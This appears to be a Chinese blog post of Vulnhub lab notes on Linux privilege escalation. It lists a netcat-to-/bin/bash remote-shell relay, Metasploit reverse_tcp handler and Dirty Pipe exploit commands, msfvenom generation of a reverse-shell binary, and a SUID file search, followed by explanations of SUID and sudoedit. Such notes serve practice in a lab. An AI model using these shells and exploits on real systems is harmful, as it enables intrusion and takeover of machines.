靶机

教程

Posted by 白泽 on October 27, 2024

靶机_vulnhub

相关命令:

find / -perm -u=s -type f 2>/dev/null
find --查找文件系统中文件和目录
/    --根目录开始查找
-perm   --权限匹配
-u=s    --|-u表示匹配用户权限,=s匹配设置了SUID的文件
2>dev/null  --将标准错误输出重定向到 /dev/null,以避免显示不必要的错误信息
nc -lvvp port   | nc ip 4444 | /bin/bash | nc ip 5555 --4xxx 输出命令,返回结果
python -m http.server port
msfconle 
use exploit/multi/handler --监听模块
set payload linux/x64/meterpreter/reverse_tcp  --进入监听paylaod
search local_exploit  --搜索漏洞脚本
use exploit/linux/local/cve_2022_0847_dirtypipe  --使用poc
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f elf > payload.elf   --生成木马文件




相关提权方法

  1. 内核漏洞提权 –利用Linux内核漏洞进行提权,如CVE-2016-5195(Dirty Cow) 工具:linux-exploit-suggester来找出可能的提权漏洞。
  2. SUID提权 –利用设置了SUID位的可执行文件提权 相关命令find / -perm -u=s -type f 2>/dev/null
  3. 计划任务(Cron Jobs)提权 –通过计划任务
  4. sudo滥用提权 –利用配置不当的sudo权限,如无需密码的sudo命令
  5. 敏感文件提权 –利用系统中的敏感文件,如/etc/passwd/etc/shadow,进行提权
  6. 通配符注入提权 –利用命令中的通配符注入来执行提权命令
  7. 服务和应用程序配置错误提权 –利用配置错误的服务和应用程序,如NFS的no_root_squash选项
  8. 使用数据库提权第三方服务提权

SUID(Set User ID)是一种与文件权限相关的特殊权限位,用于在执行可执行文件时改变进程的有效用户 ID(UID)。当一个可执行文件设置了 SUID 权限,并且被普通用户执行时,该进程将以该文件的所有者(通常是文件的拥有者)的权限运行,而不是执行该进程的用户的权限。

SUID 权限通常用于需要特殊权限和权限访问的程序,以便普通用户可以执行它们而无需直接获取特权。典型的例子是 passwd 命令,它允许用户更改他们的密码。由于更改密码需要访问 /etc/shadow 文件,而该文件对普通用户是不可读的,因此 passwd 命令被设置了 SUID 权限,以便普通用户可以以文件所有者的权限运行该命令。

要设置文件的 SUID 权限,可以使用 chmod 命令并添加数字 4 或通过设置权限位为数字 4 的八进制值(如 4755)来设置 SUID 位。例如,要将文件的权限设置为 -rwsr-xr-x,可以使用以下命令:
`chmod u+s filename`

sudoedit
它的作用是以超级用户权限编辑根目录 (/) 下的文件。
sudoedit 命令是 sudo 工具的一部分,它允许普通用户以超级用户 (root) 的权限编辑指定的文件。在执行 sudoedit 命令之前,用户需要通过输入自己的密码来验证身份,并获得执行特权操作的授权。

-s 选项用于以安全模式编辑文件。